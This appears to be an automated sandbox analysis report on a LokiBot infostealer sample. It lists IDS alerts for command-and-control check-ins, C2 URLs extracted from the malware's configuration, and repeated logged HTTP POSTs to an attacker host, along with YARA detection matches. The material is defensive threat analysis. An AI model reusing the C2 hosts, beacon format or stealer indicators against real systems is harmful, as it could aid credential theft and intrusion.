          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49882 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49882
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49883 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49883
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49885 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49885
          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49886 -> 185.185.69.76:80
          Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.185.69.76:80 -> 192.168.2.6:49886
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
          Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
          Source: Joe Sandbox ViewASN Name: SPRINTHOSTRU SPRINTHOSTRU
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: global trafficHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 169Connection: close
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: kVijllv0Yl.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: kVijllv0Yl.exe, 00000001.00000002.602862765.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://secure01-redirect.net/gc15/fre.php
          Source: kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
          Source: unknownHTTP traffic detected: POST /gc15/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: secure01-redirect.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 7A2E941EContent-Length: 196Connection: close
          Source: unknownDNS traffic detected: queries for: secure01-redirect.net
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
          Source: C:\Users\user\Desktop\kVijllv0Yl.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
          Source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
          Source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
          Source: kVijllv0Yl.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 0.2.kVijllv0Yl.exe.1ade0000.3.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
          Source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
          Source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
